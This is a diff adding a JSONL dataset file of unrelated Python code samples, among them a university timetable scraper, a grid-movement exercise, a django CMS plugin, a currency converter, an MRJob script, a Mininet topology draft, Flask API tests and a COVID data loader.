diff --git "a/2194.jsonl" "b/2194.jsonl"
new file mode 100644
--- /dev/null
+++ "b/2194.jsonl"
@@ -0,0 +1,585 @@
+{"seq_id":"383912425","text":"import constants\nimport requests\nimport lxml.html as html\nimport datetime\nimport os\nimport pickle\n\n\nclass Groups:\n def __init__(self, *group):\n self.group, *self.subgroup = ' '.join(group).split(' (', maxsplit=1)\n self.subgroup = ''.join(self.subgroup)\n\n if self.group == '':\n self.group = None\n\n if self.subgroup == '':\n self.subgroup = None\n else:\n self.subgroup = '(' + self.subgroup\n\n def __str__(self):\n if self.subgroup is None:\n return self.group\n elif self.group is None:\n return None\n else:\n return self.group + ' ' + self.subgroup\n\n def __eq__(self, other):\n if isinstance(other, Groups):\n return self.group == other.group and self.subgroup == other.subgroup\n else:\n raise TypeError(\"unsupported type(s) for operator ==: %s\" % type(other).__name__)\n\n def __contains__(self, item):\n if isinstance(item, Groups):\n return self.group == item.group and self.subgroup == item.subgroup\n else:\n raise TypeError(\"unsupported type(s) for operator in: %s\" % type(item).__name__)\n\n def full(self):\n if self.subgroup is None:\n return self.group\n elif self.group is None:\n return None\n else:\n return self.group + ' ' + self.subgroup\n\n\nclass SibFUTimetable:\n def __init__(self, group=None, url=constants.URL_TIMETABLES, local=True):\n if isinstance(group, Groups) or group is None:\n self.url = url\n self.group = group\n self.local = local\n self._timetable = None\n if self.group is not None:\n self._get_raw_timetable()\n else:\n raise TypeError(\"Arg group must be %s\" % type(Groups).__name__)\n\n def __get_request(self):\n if self.group is None:\n raise ValueError(\"Arg group is None\")\n \"\"\"\n Сайт СФУ самый лучший. Непонятно откуда у некоторых групп взялись плюсики.\n Поэтому в первом if обрабатываем исключительные группы\n \"\"\"\n # ВЦ16-03РТВ (1 подгруппа)\n # ВЦ15-03РТВ (1 подгруппа)\n # +1+подгруппа\n\n exceptions = (Groups('ВЦ16-03РТВ (1 подгруппа)'),\n Groups('ВЦ15-03РТВ (1 подгруппа)'))\n if self.group in exceptions:\n if self.group == exceptions[0]: # ВЦ16-03РТВ (1 подгруппа)\n return constants.TIMETABLE_REQUEST + 'ВЦ16-03РТВ+%28+1+подгруппа%29'\n elif self.group == exceptions[1]: # ВЦ15-03РТВ (1 подгруппа)\n return constants.TIMETABLE_REQUEST + 'ВЦ15-03РТВ+%28+1+подгруппа%29'\n if self.group.subgroup: # Если есть подгруппа\n group = self.group.full()\n else:\n group = self.group.group\n\n request = constants.TIMETABLE_REQUEST + group.replace('/', '%2F')\n\n return constants.TIMETABLE_REQUEST + \\\n group.replace('/', '%2F').replace('(', '%28').replace(' ', '+').replace(')', '%29')\n\n def __filename_parser(self):\n if self.group is None:\n raise ValueError(\"Arg group is None\")\n return self.group.full().replace(' ', '').replace('/', '').replace('-', '').replace(')', '').replace('(', '').upper()\n\n def write(self):\n if self.group is None:\n raise ValueError(\"Arg group is None\")\n if self._timetable is None:\n raise ValueError(\"Timetable is None. 
Nothing to write\")\n try:\n os.mkdir(os.getcwd() + '/timetables')\n except FileExistsError:\n pass\n filename = os.getcwd() + '/timetables/' + self.__filename_parser()\n\n with open(filename, 'wb') as file:\n pickle.dump(self._timetable, file)\n\n def read(self):\n if self.group is None:\n raise ValueError(\"Arg group is None\")\n filename = os.getcwd() + '/timetables/' + self.__filename_parser()\n\n with open(filename, 'rb') as file:\n self._timetable = pickle.load(file)\n\n def __get_raw_timetable(self):\n if self.group is None:\n raise ValueError(\"Arg group must be not None\")\n \"\"\"\n\n timetable[i][0] - День недели,'№', номер занятия\n timetable[N][2][i] - (нечетная) Название, тип, преподаватель, кабинет,\n где N такой, что timetable[N][0] - номер занятия.\n timetable[N][3][i] - (четная) Название, тип, преподаватель, кабинет, где N такой,\n что timetable[N][0] - номер занятия.\n Если IndexError, то одно и тоже занятие каждую неделю.\n\n Возвращает список, в котором можно получить любой элемент по индексу.\n timetable[Нечетная/Четная неделя(0-1)][День недели, пн-сб(0-5)][лента(0-6)]\n\n \"\"\"\n page = requests.get(self.__get_request())\n tree = html.fromstring(page.content)\n raw_timetable = tree.xpath(\"//table[@class=\\\"table timetable\\\"]/*\")\n\n raw_timetable.append('Воскресенье') # Для правильной работы алгоритма\n\n timetable_final = [[], []]\n tmp_tt_odd = []\n tmp_tt_even = []\n tmp = [[], []]\n for i in raw_timetable:\n try:\n current = i[0].text_content()\n except AttributeError:\n current = i\n if current in constants.DAYS_WEEK and current != 'Понедельник':\n\n # Нечетная неделя\n if not tmp[0]:\n timetable_final[0].append(constants.DAYOFF)\n else:\n timetable_final[0].append(tmp[0][:])\n # Четная неделя\n if not tmp[1]:\n timetable_final[1].append(constants.DAYOFF)\n else:\n timetable_final[1].append(tmp[1][:])\n\n tmp = [[], []]\n continue\n\n if current in constants.LESSON_TIME:\n tmp_tt_odd = []\n tmp_tt_even = []\n tmp_tt_odd.append(current) # добавляем номер занятия в начало\n tmp_tt_even.append(current) #\n\n if i[2].text_content() != '': # занятие на нечетной неделе\n for j in i[2]:\n if j.text_content() != '':\n tmp_tt_odd.append(j.text_content())\n if j.tail is not None: # в tail хранится тип занятия или None\n tmp_tt_odd.append(j.tail[1:]) # первый символ пробел\n else:\n tmp_tt_odd.pop()\n\n try:\n if i[3].text_content() != '': # занятие на четной неделе\n for j in i[3]:\n if j.text_content() != '':\n tmp_tt_even.append(j.text_content())\n if j.tail is not None: # в tail хранится тип занятия или None\n tmp_tt_even.append(j.tail[1:]) # первый символ пробел\n else:\n tmp_tt_even.pop()\n except IndexError: # если i[3] не существует, значит занятие на четной такое же, как и на нечетной\n for j in i[2]:\n if j.text_content() != '':\n tmp_tt_even.append(j.text_content())\n if j.tail is not None: # в tail хранится тип занятия или None\n tmp_tt_even.append(j.tail[1:]) # первый символ пробел\n if tmp_tt_odd:\n tmp[0].append(tmp_tt_odd[:])\n if tmp_tt_even:\n tmp[1].append(tmp_tt_even[:])\n if timetable_final:\n self._timetable = timetable_final\n else:\n self._timetable = None\n\n def _get_raw_timetable(self):\n if self.local:\n self.read()\n elif self.local is False:\n self.__get_raw_timetable()\n else:\n return False\n\n def get_groups(self):\n if self.local:\n filename = os.getcwd() + '/timetables/GROUPS'\n with open(filename, 'r') as file:\n return [Groups(i.rstrip()) for i in file.readlines()]\n if self.local is False:\n page = requests.get(self.url)\n\n tree 
= html.fromstring(page.content)\n raw_groups = tree.xpath(\".//div[@class=\\\"collapsed-content\\\"]/ul/li/a[@href]/text()\")\n\n return [Groups(i.replace('\\xa0', ' ')) for i in raw_groups]\n\n def get_day(self,\n week_number=datetime.datetime.today().isocalendar()[1],\n week_day=datetime.datetime.today().weekday()):\n if 0 <= week_day <= 5 and week_number >= 0:\n week_number = constants.ODD if week_number % 2 == 0 else constants.EVEN # 0 - нечетная, 1 четная недели\n try:\n return self._timetable[week_number][week_day]\n except IndexError:\n return None\n elif week_day == 6:\n return None\n else:\n raise ValueError('week_day must be in [0, 5] and week_number [0, ...) not %d, %d' % (week_day, week_number))\n\n def get_week(self, week_number=datetime.datetime.today().isocalendar()[1]):\n if week_number >= 0:\n week_number = constants.EVEN if week_number % 2 == 0 else constants.ODD\n try:\n return self._timetable[week_number]\n except IndexError:\n return None\n else:\n raise ValueError('week_number must be in [0, ...) not %d' % (week_number))\n\n def set_group(self, group):\n self.group = Groups(group)\n\n def save_groups(self, *groups):\n try:\n os.mkdir(os.getcwd() + '/timetables')\n except FileExistsError:\n pass\n filename = os.getcwd() + '/timetables/GROUPS'\n with open(filename, 'w') as file:\n for i in groups:\n if not isinstance(i, Groups):\n raise TypeError(\"%s is not Groups type\" % i)\n file.write(i.full() + '\\n')\n\n\ndef save_timetables_local():\n \"\"\"\n\n Моя функция личная. Что хочу, то и делаю\n\n \"\"\"\n groups = SibFUTimetable(local=False).get_groups()\n SibFUTimetable().save_groups(*groups)\n count = 0\n progress_cur = 0\n progress_to = len(groups) / 100\n\n for i in groups:\n SibFUTimetable(group=i, local=False).write()\n count += 1\n if count > (progress_to*progress_cur + 1):\n progress_cur += 1\n print(str(progress_cur) + '% (' + str(count) + '/' + str(len(groups)) + ')')\n\n# save_timetables_local()\n","sub_path":"sibfutimetable.py","file_name":"sibfutimetable.py","file_ext":"py","file_size_in_byte":11556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"1016383","text":"\"\"\"\n[문제]\n- 여행가 A는 N x N 크기의 정사각형 공간 위에 서 있습니다. \n 이 공간은 1 x 1 크기의 정사각형으로 나누어져 있습니다. \n 가장 왼쪽 위 좌표는 (1,1)이며, 가장 오른쪽 아래 좌표는 (N,N)에 해당합니다.\n 여행가 A는 '상,하,좌,우 방향으로 이동'할 수 있으며, 시작 좌표는 항상 (1,1)입니다. \n 우리 앞에는 여행가 A가 이동할 계획이 적힌 계획서가 놓여 있습니다. \n\n- 계획서에는 하나의 줄에 띄어쓰기를 기준으로 하여 L, R, U, D 중 하나의 문자가 반복적으로 \n 적혀 있습니다. 각 문자의 의미는 다음과 같습니다. \n > L : 왼쪽으로 한 칸 이동\n > R : 오른쪽으로 한 칸 이동\n > U : 위로 한 칸 이동\n > D : 아래로 한 칸 이동 \n\n- 이때 여행가 A가 N x N 크기의 정사각형 공간을 벗어나는 움직임은 무시됩니다. \n 예를 들어 (1,1)의 위치에서 L혹은 U를 만나면 무시됩니다. \n 1,1 | 1,2 | 1,3\n 2,1 | 2,2 | 2,3\n 3,1 | 3,2 | 3,3 \n\n (입력조건)\n - 첫째 줄에 공간의 크기를 나타내는 N이 주어집니다. ( 1<=N<=100 )\n - 둘째 줄에 여행가 A가 이동할 계획서 내용이 주어집니다. ( 1 <= 이동횟수 <= 100 )\n\n (출력조건)\n - 첫째 줄에 여행가 A가 최종적으로 도착할 지점의 좌표 (X,Y)를 공백을 기준으로 구분하여 출력합니다. \n\n # 입력 예시 \n 5 \n R R R U D D \n\n # 출력 예시 \n 3 4\n\n--------------------\n- 이 문제는 요구사항대로 충실히 구현하면 되는 문제입니다. \n- 일련의 명령에 따라서 개체를 차례대로 이동시킨다는 점에서 '시물레이션(Simulation) 유형'으로도 분류\n 되며 구현이 중요한 대표적인 문제 유형입니다. 
\n > 다만, 알고리즘 교재나 문제 풀이 사이트에 따라서 다르게 일컬을 수 있으므로 , \n 코딩 테스트에서의 시뮬레이션 유형, 구현 유형, 완전 탐색 유형은 서로 유사한 점이 많다는 정도로만 기억하면됨\n\n\n\"\"\"\n\n\n# N 입력 받기 \nn = int(input())\nx,y = 1,1\nplans = input().split()\n\n# L,R,U,D에 따른 이동방향 // 2차원 x,y 좌표 생각하기 \nd_row = [0,0,-1,1]\nd_column = [-1,1,0,0]\n\nmove_type = ['L','R','U','D']\n\nfor plan in plans:\n # 이동 후 좌표 구하기\n for i in range(len(move_type)):\n if plan == move_type[i]:\n nx = x + d_row[i]\n ny = y + d_column[i]\n # 공간을 벗어나는 경우 무시\n if nx < 1 or ny < 1 or nx > n or ny > n:\n continue\n # 이동 수행 \n x,y = nx,ny \n\n \nprint(f\"{x} , {y}\")\n\n\n\n\n","sub_path":"4장구현/1_상하좌우.py","file_name":"1_상하좌우.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"212132674","text":"import os\nfrom cms.plugin_pool import plugin_pool\nfrom cms.plugin_base import CMSPluginBase\nfrom django.utils.translation import ugettext_lazy as _\nimport models\nfrom django.conf import settings\n\nfrom filer.settings import FILER_ADMIN_ICON_SIZES, FILER_PUBLICMEDIA_PREFIX, FILER_PRIVATEMEDIA_PREFIX, FILER_STATICMEDIA_PREFIX\n\nclass FilerImagePlugin(CMSPluginBase):\n model = models.FilerImage\n name = _(\"Image\")\n render_template = \"cmsplugin_filer_image/image.html\"\n text_enabled = True\n raw_id_fields = ('image',)\n admin_preview = False\n fieldsets = (\n (None, {\n 'fields': ('caption', 'image', 'image_url', 'alt_text', 'css_class',\n 'thumbnail_option',)\n }),\n ('advanced thumbnail option', {\n 'classes': ('collapse',),\n 'fields': ('use_autoscale', 'width', 'height',\n 'crop', 'upscale','float')\n }),\n ('More', {\n 'classes': ('collapse',),\n 'fields': ('free_link', 'page_link', 'description',)\n }), \n \n )\n \n def _get_thumbnail_size(self, context, instance):\n \"\"\"\n Return the size of the thumbnail that should be inserted\n \"\"\"\n \n placeholder_width = context.get('width', None)\n if instance.thumbnail_option:\n if instance.thumbnail_option.width:\n width = instance.thumbnail_option.width\n if instance.thumbnail_option.height:\n height = instance.thumbnail_option.height\n else:\n # height was not externally defined: use ratio to scale it by the width\n height = int( float(width)*float(instance.image.height)/float(instance.image.width) )\n elif instance.use_autoscale and placeholder_width:\n # use the placeholder width as a hint for sizing\n width = placeholder_width\n # height was not externally defined: use ratio to scale it by the width\n height = int( float(width)*float(instance.image.height)/float(instance.image.width) )\n else:\n if instance.width:\n width = instance.width\n else:\n width = instance.image.width\n if instance.height:\n height = instance.height\n if width == instance.image.width:\n # width was not externally defined: use ratio to scale it by the height\n width = int( float(height)*float(instance.image.width)/float(instance.image.height) )\n else:\n # height was not externally defined: use ratio to scale it by the width\n height = int( float(width)*float(instance.image.height)/float(instance.image.width) )\n return (width, height)\n \n def get_thumbnail(self, context, instance):\n if instance.image:\n width, height = self._get_thumbnail_size(context, instance)\n # build thumbnail options\n if instance.thumbnail_option:\n crop = instance.thumbnail_option.crop\n upscale = instance.thumbnail_option.upscale\n else:\n crop = instance.crop\n upscale = instance.upscale\n thumbnail_opts = {\n 'size': self._get_thumbnail_size(context, instance),\n 'crop': 
crop,\n 'upscale': upscale,\n }\n return instance.image.image.file.get_thumbnail(thumbnail_opts)\n \n def render(self, context, instance, placeholder):\n if instance.image:\n width, height = self._get_thumbnail_size(context, instance)\n thumbnail = self.get_thumbnail(context, instance)\n context.update({\n 'object':instance,\n 'link':instance.link,\n 'thumbnail': thumbnail,\n 'placeholder':placeholder\n })\n return context\n \n def icon_src(self, instance):\n if instance.image:\n # TODO: Find a cleaner way\n # Fake the context because it is not available at this stage\n # this will cause a bug when using autoscale\n thumbnail = self.get_thumbnail({}, instance)\n return thumbnail.url\n else:\n return os.path.normpath(u\"%s/icons/missingfile_%sx%s.png\" % (FILER_STATICMEDIA_PREFIX, 32, 32,))\nplugin_pool.register_plugin(FilerImagePlugin)\n","sub_path":"src/cmsplugin_filer_image/cms_plugins.py","file_name":"cms_plugins.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"31778828","text":"import requests\n\nrespuesta_inicial = requests.get('http://api.fixer.io/latest')\nrespuesta_inicial = respuesta_inicial.json()\nmonedas = [respuesta_inicial['base']]\n\nfor nombre, valor in respuesta_inicial['rates'].items():\n monedas.append(nombre)\n\nprint('Tipos de moneda disponibles:')\nfor indice, nombre in enumerate(monedas):\n print('{}. {}'.format(indice + 1, nombre))\n\ninicio = int(input('Seleccione moneda de inicio: '))\nmoneda_inicio = monedas[inicio - 1]\n\nfinal = int(input('Seleccione moneda a convertir: '))\nmoneda_final = monedas[final - 1]\n\nmonto = float(input('Ingrese monto: '))\n\ntipo_cambio = requests.get('http://api.fixer.io/latest',\n params={'base': moneda_inicio})\ntipo_cambio = tipo_cambio.json()\nfactor_cambio = tipo_cambio['rates'][moneda_final]\n\nprint('Resultado: {}'.format(monto * factor_cambio))\n","sub_path":"clase3/fixer.py","file_name":"fixer.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"227555841","text":"import sys\nimport datetime\nfrom pathlib import Path \ncurrent_path = Path(__file__).absolute()\nabs_path = str(current_path.parent.parent)\nsys.path.append(abs_path)\n\nfrom capture import Capture\nfrom utils import to_date\n\ndef from_api_to_db(data_list, url, numero_captura):\n \n func = lambda datum: dict(\n id_proposicao= datum['codProposicao'],\n nome_proposicao= datum['nomeProposicao'],\n data_votacao= to_date(datum['dataVotacao'], '%d/%m/%Y'),\n data_captura= datetime.datetime.now(),\n url_captura= url,\n numero_captura= numero_captura\n )\n\n return map(func, data_list)\n\n\n\n\ndef urls_generator(capture, base_url):\n\n with capture.engine.connect() as conn:\n result = list(conn.execute(\"select MAX(numero_captura) \\\n from camara_v1.proposicoes_votadas_plenario\"))\n\n if result[0][0] is None:\n numero_captura = 1\n else:\n numero_captura = int(result[0][0]) + 1\n\n year = datetime.datetime.strftime(datetime.datetime.now(), '%Y')\n\n return base_url.format(year), numero_captura\n\ndef main():\n\n capture = Capture(schema='camara_v1')\n\n # capture data with this\n base_url = 'http://www.camara.leg.br/SitCamaraWS/Proposicoes.asmx/ListarProposicoesVotadasEmPlenario?ano={}&tipo='\n url, numero_captura = urls_generator(capture, base_url)\n print(url, numero_captura)\n try:\n capture.capture_data(url)\n except TypeError:\n print('Not Enough Data')\n return\n\n # 
get the list of dict for this table\n data_list = capture.data['proposicoes']['proposicao']\n data_list = capture.to_default_dict(data_list) \n data_list = from_api_to_db(data_list, url, numero_captura) \n capture.insert_data(data_list, table_name='proposicoes_votadas_plenario', \n if_exists='pass', key='id_proposicao')\n\nif __name__ == '__main__':\n main()\n","sub_path":"bigua/API/camara_v1/proposicoes_votadas_plenario.py","file_name":"proposicoes_votadas_plenario.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"392914498","text":"import os\nimport sys\nfrom mininet.topo import Topo\nfrom mininet.net import Mininet\nfrom mininet.node import CPULimitedHost\nfrom mininet.link import TCLink\nfrom mininet.node import OVSController\nfrom mininet.node import Controller\nfrom mininet.node import RemoteController\nfrom mininet.cli import CLI\nsys.path.append(\"../../\")\nfrom pox.ext.jelly_pox import JELLYPOX\nfrom subprocess import Popen\nfrom time import sleep, time\nfrom random import randint\n\nclass JellyFishTop(Topo):\n ''' TODO, build your topology here'''\n def build(self):\n\n k = 10\n r = 5 #for switch to switch\n #k-r = for servers\n num_switches = 100\n num_servers = 100\n switch_neighbors = {}\n num_ports_used = [0 for i in range(100)]\n free_candidates = set([])\n break_links_set = set([])\n switches = []\n for i in range(num_switches) :\n switch_neighbors[i] = set([])\n for i in range(num_switches) :\n name = 's' + i\n switches[i]= self.addSwitch( name )\n free_candidates.add(i)\n for i in range(num_servers) :\n name = 'h' + i\n switches[i]= self.addSwitch( name )\n\n\n while (len(free_candidates) >= 2) :\n pair = random.sample(free_candidates,2)\n src = pair[0]\n dst = pair[1]\n if src == dst :\n continue #probably unneed, better safe than sorry\n if dst in switch_neighbors[src] :\n has_available_connections = False\n for available in free_candidates :\n if available not in switch_neighbors[src] :\n has_available_connections = True\n break\n if not has_available_connections :\n break_links_set.add(src)\n free_candidates.remove(src)\n continue\n\n self.addLink(switches[src], switches[dst])\n num_ports_used[src] += 1\n num_ports_used[dst] += 1\n if num_ports_used[src] == r :\n free_candidates.remove(src)\n if num_ports_used[dst] == r :\n free_candidates.remove(dst)\n switch_neighbors[src].add(dst)\n switch_neighbors[dst].add(src)\n\n break_links_set = free_candidates.union(break_links_set)\n for switch_i in break_links_set :\n while num_ports_used[switch_i] < (r-2) :\n random_switch_a = random.randint(num_switches)\n if random_switch_a in switch_neighbors[switch_i] :\n continue\n random_switch_b = random.sample(switch_neighbors[random_switch_a],1)\n if random_switch_b in switch_neighbors[switch_i] :\n continue\n self.delLink(switches[random_switch_a], switches[random_switch_b])\n self.addLink(switches[random_switch_a], switches[switch_i])\n self.addLink(switches[random_switch_b], switches[switch_i])\n num_ports_used[switch_i] += 2\n\n\n\n\n\n\n # leftHost = self.addHost( 'h1' )\n # rightHost = self.addHost( 'h2' )\n # leftSwitch = self.addSwitch( 's3' )\n # rightSwitch = self.addSwitch( 's4' )\n\n # # Add links\n # self.addLink( leftHost, leftSwitch )\n # self.addLink( leftSwitch, rightSwitch )\n # self.addLink( rightSwitch, rightHost )\n\n\ndef experiment(net):\n net.start()\n sleep(3)\n net.pingAll()\n net.stop()\n\ndef main():\n\ttopo = JellyFishTop()\n\tnet = Mininet(topo=topo, 
host=CPULimitedHost, link = TCLink, controller=JELLYPOX)\n\texperiment(net)\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"pox/pox/ext/build_topology_jelly.py","file_name":"build_topology_jelly.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"288759955","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom flaskr import create_app\nfrom models import setup_db, Question, Category\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUpDatabase(self, database_name):\n self.database_path = \"postgres://{}/{}\".format(\n 'postgres:1234@localhost:5432', database_name)\n setup_db(self.app, self.database_path)\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n self.empty_database_name = \"trivia_empty_test\"\n self.setUpDatabase(self.database_name)\n \n\n self.test_question = {\n 'question': 'Which Star Wars movie is the best?',\n 'category': 3,\n 'answer': 'The Last Jedi',\n 'difficulty': 1\n }\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n def test_get_categories(self):\n res = self.client().get(\"/categories\")\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertTrue(data['categories'])\n self.assertTrue(len(data['categories']))\n\n def test_get_categories_not_found(self):\n # Switch to an empty database to test this specific scenario where there are no categories at all\n self.setUpDatabase(self.empty_database_name)\n\n res = self.client().get(\"/categories\")\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertFalse(data['success'])\n\n self.setUpDatabase(self.database_name)\n\n def test_add_question(self):\n res = self.client().post('/questions/add', json=self.test_question)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n\n def test_get_question(self):\n res = self.client().get('/questions?page=1')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertTrue(data['questions'])\n\n def test_get_question_not_found(self):\n res = self.client().get('/questions?page=100')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertFalse(data['success'])\n\n def test_get_question_by_category(self):\n res = self.client().get('/categories/0/questions?page=1')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertTrue(data['questions'])\n self.assertTrue(len(data['questions']))\n self.assertGreaterEqual(data['totalQuestions'], 0)\n self.assertGreaterEqual(data['currentCategory'], 0)\n\n\n def test_get_question_by_category_not_found(self):\n res = self.client().get('/categories/100/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertFalse(data['success'])\n\n def test_delete_question(self):\n question = Question.query.first()\n question_id = question.id\n res = self.client().delete('/questions/' + 
str(question_id))\n data = json.loads(res.data)\n question = Question.query.get(question_id)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertFalse(question)\n\n def test_delete_question_not_found(self):\n question_id = 1000\n res = self.client().delete('/questions/' + str(question_id))\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertFalse(data['success'])\n\n def test_search_question(self):\n res = self.client().post(\n '/questions/search',\n json={\n 'searchTerm': 'Star Wars'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n\n self.assertTrue(data['questions'])\n self.assertTrue(len(data['questions']))\n\n self.assertGreaterEqual(data['totalQuestions'], 0)\n self.assertGreaterEqual(data['currentCategory'], 0)\n\n def test_search_question_not_found(self):\n res = self.client().post(\n '/questions/search',\n json={\n 'searchTerm': 'Star Trek'})\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 400)\n self.assertFalse(data['success'])\n\n def test_play(self):\n res = self.client().post(\n '/quizzes',\n json={\n 'previous_questions': [],\n 'quiz_category': {\n 'id': '0',\n 'type': 'Science'\n }\n })\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertTrue(data['question'])\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"projects/02_trivia_api/starter/backend/test_flaskr.py","file_name":"test_flaskr.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"77020705","text":"from mrjob.job import MRJob\nimport time\n\nclass PartA2(MRJob):\n\n def mapper(self, _, line):\n try:\n fields = line.split(',')\n raw_timestamp = int(fields[6])\n trxn_value = float(fields[3]) / 1000000000000000000\n year_month = time.strftime('%Y-%m', time.gmtime(raw_timestamp))\n yield (year_month, {'count': 1, 'trxn_value': trxn_value})\n except:\n pass\n\n def combiner(self, key, value):\n total_value = 0.0\n total_count = 0\n\n for val in value:\n total_count += val['count']\n total_value += val['trxn_value']\n\n result = { 'count': total_count, 'trxn_value': total_value }\n\n yield (key, result)\n\n def reducer(self, key, value):\n total_value = 0.0\n total_count = 0\n\n for val in value:\n total_count += val['count']\n total_value += val['trxn_value']\n\n avg_value = total_value / total_count\n\n yield (key, avg_value)\n\nif __name__ == '__main__':\n PartA2.JOBCONF = {'mapreduce.job.reduces': '4'}\n PartA2.run()\n\n#Code Ends\n","sub_path":"PartA/PartA_AverageTransactions.py","file_name":"PartA_AverageTransactions.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"387605490","text":"import json\nimport os\nimport fnmatch\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\nimport matplotlib.pyplot as pl\nimport statistics\nfrom srcs.load_dailydata import load_daydata\n\ndef dataframe_tojson(country, data):\n\tdata.to_json(f'{country}.json')\n\twith open(f'{country}.json', 'r') as f:\n\t\tstuff = json.load(f)\n\twith open(f'{country}.json', 'w') as f:\n\t\tjson.dump(stuff, f, indent=4)\n\nif __name__ == \"__main__\":\n\tall_days = list()\n\tfor file in os.listdir('daily-stats/'):\n\t\tif fnmatch.fnmatch(file, 
'*.json'):\n\t\t\tall_days.append(load_daydata(f\"daily-stats/{file}\"))\n\t\n\tall_data = pd.concat(all_days).groupby(['countryRegion', 'date']).sum()\n\tcountries_list = sorted(set(list(zip(*all_data.index))[0]))\n\t\n\t# countries_interest = ['Finland', 'Italy', 'Iran', 'US', 'Japan', 'South Korea']\n\t# countries_interest = ['Finland', 'France', 'UK', 'Germany', 'Belgium']\n\tcountries_interest = ['South Korea']\n\t# data_sets = list()\n\tfor country in countries_interest:\n\t\tnew = all_data.loc[country]\n\t\tl = len(new.index)\n\t\ti = range(l)\n\t\tnew['index'] = i\n\t\tnew = new.set_index(['index'])\n\t\tprint(new)\n\t# \tratios = list()\n\t# \tratios.append(1)\n\t# \tk = 1\n\t# \twhile k < len(new.index):\n\t# \t\tr = new['confirmed'][k]/new['confirmed'][k - 1]\n\t# \t\tratios.append(r)\n\t# \t\tk += 1\n\t\t# Prediction data filler\n\t\t# i = len(new['confirmed']) - 7\n\t\t# rats_conf = list()\n\t\t# rats_rec = list()\n\t\t# rats_dead = list()\n\t\t# while i < len(new['confirmed']):\n\t\t# \trats_conf.append(new['confirmed'][i]/new['confirmed'][i - 1])\n\t\t# \trats_rec.append(new['recovered'][i]/new['recovered'][i - 1])\n\t\t# \trats_dead.append(new['deaths'][i - 1]/new['confirmed'][i - 1])\n\t\t# \ti += 1\n\t\t# med_conf = statistics.median(rats_conf)\n\t\t# med_rec = statistics.median(rats_rec)\n\t\t# med_dead = statistics.median(rats_dead) + 1\n\t\t# print(f\"{country}:\\nConfirmed {med_conf} | Recovered {med_rec} | Deaths {med_dead}\")\n\t\t# start_date = new.index[-1]\n\t\t# end_date = dt.datetime.strptime(\"04/30/2020\", \"%m/%d/%Y\")\n\t\t# current = dict()\n\t\t# tmp_date = start_date\n\t\t# predict = list()\n\t\t# tmp_conf = new['confirmed'][-1]\n\t\t# tmp_rec = new['recovered'][-1]\n\t\t# tmp_dead = new['deaths'][-1]\n\t\t# while tmp_date < end_date:\n\t\t# \ttmp_date += dt.timedelta(days=1)\n\t\t# \tcurrent = dict()\n\t\t# \tcurrent['date'] = tmp_date\n\t\t# \tcurrent['confirmed'] = tmp_conf * med_conf\n\t\t# \tcurrent['deaths'] = tmp_dead * med_dead\n\t\t# \tcurrent['recovered'] = tmp_rec * med_rec\n\t\t# \tpredict.append(current)\n\t\t# \ttmp_conf = current['confirmed']\n\t\t# \ttmp_dead = current['deaths']\n\t\t# \ttmp_rec = current['recovered']\n\t\t# fut = pd.DataFrame(predict)\n\t\t# fut = fut.set_index('date')\n\t\t# new = pd.concat([new, fut])\n\t\t# dataframe_tojson(country, new)\n\t\t# print(new_rats)\n\t\t# new['ratio'] = ratios\n\t\t# data_sets.append(new)\n\t\n\t# Plottings\n\t# fig, ax = pl.subplots()\n\t# i = 0\n\t# while i < len(countries_interest):\n\t# \tax.step(data_sets[i].index, data_sets[i]['confirmed'], where='mid', label=f'{countries_interest[i]} Confirmed')\n\t# \tax.plot(data_sets[i].index, data_sets[i]['confirmed'], color='grey', alpha=0.3)\n\t# \tax.step(data_sets[i].index, data_sets[i]['recovered'], where='mid', label=f'{countries_interest[i]} Recovered')\n\t# \tax.plot(data_sets[i].index, data_sets[i]['recovered'], color='grey', alpha=0.3)\n\t# \tax.step(data_sets[i].index, data_sets[i]['deaths'], where='mid', 